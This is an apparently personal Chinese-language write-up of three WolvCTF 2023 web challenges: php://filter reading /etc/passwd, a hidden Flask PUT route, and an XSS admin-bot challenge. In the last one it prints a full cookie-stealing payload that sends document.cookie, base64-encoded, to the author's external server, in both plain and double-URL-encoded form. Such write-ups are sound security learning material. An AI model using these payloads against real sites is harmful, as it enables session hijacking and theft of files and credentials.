Wolv2023

Posted on Edited on

前言

不知道是个啥比赛,记录一下

filter-madness

题目打开有个提交框,尝试输入123,发现返回如下:

1
2
3
4
5
6
7
8
Warning: file_get_contents(): Unable to locate filter "123" in /var/www/html/index.php on line 11

Warning: file_get_contents(): Unable to create filter (123) in /var/www/html/index.php on line 11
Can you submit some madness that will return the flag?

Your filter madness: php://filter/123/resource=/etc/passwd
Your filter madness length: 37
Your filter madness results: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin

如果是输入convert.base64-encode,返回的/etc/passwd编码后的内容

1
2
3
4
5
Can you submit some madness that will return the flag?

Your filter madness: php://filter/convert.base64-encode/resource=/etc/passwd
Your filter madness length: 55
Your filter madness results: cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2Jpb

咋一看考察的是php://filer协议,但是这里的resource访问的资源被写死成/etc/passwd了。经过测试 / 啥的也被ban了,试了很多方式都行不通,但是这里给了一个info,点进去发现是个phpinfo,尝试全局搜索了一下flag,还真有???不知道考点是啥。

charlottesweb

F12可以看到提示<!--/src-->

访问src可以看到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
  return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
  return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
  return open('flag').read()

逻辑很简单,put方法访问一下/super-secret-route-nobody-will-guess即可。

zombie-101

考点是xss打cookie,想到了是xss打cookie,但是最后没有利用成功,这里编码有点意思。

1
http://49.232.142.230:11521/visit?url=http%3A%2F%2F49.232.142.230%3A12623%2Fzombie%3Fshow%3D%253Cscript%253Ewindow.location%253D'http%253A%252F%252F220.203.23.131%253A8010%252F%253Fcookie%253D'%252Bbtoa(JSON.stringify(document.cookie))%253B%253C%252Fscript%253E

pZ6E3a8.png

show那里存在XSS,底下check那里给了url,说是visit访问,所以很容易想到利用管理员的身份去访问拿cookie

但是这里有个小问题,我直接输入我的服务器vps会得到:

pZ6EyiF.png

hostname需要为49.232.142.230,所以这里涉及到嵌套。

利用到的poc:?url=http://49.232.142.230:12623/zombie?show=<script>window.location='http://220.203.23.131:8010/?cookie='+btoa(JSON.stringify(document.cookie));</script>

这里有个细节需要注意,前面的部分url编码一次,从show=开始需要编码两次。所以最终的poc:

1
http://49.232.142.230:12623/visit?url=http%3A%2F%2F49.232.142.230%3A12623%2Fzombie%3Fshow%3D%253Cscript%253Ewindow.location%253D'http%253A%252F%252F220.203.23.131%253A8010%252F%253Fcookie%253D'%252Bbtoa(JSON.stringify(document.cookie))%253B%253C%252Fscript%253E

pZ6EXLt.png

base64解码一下即可。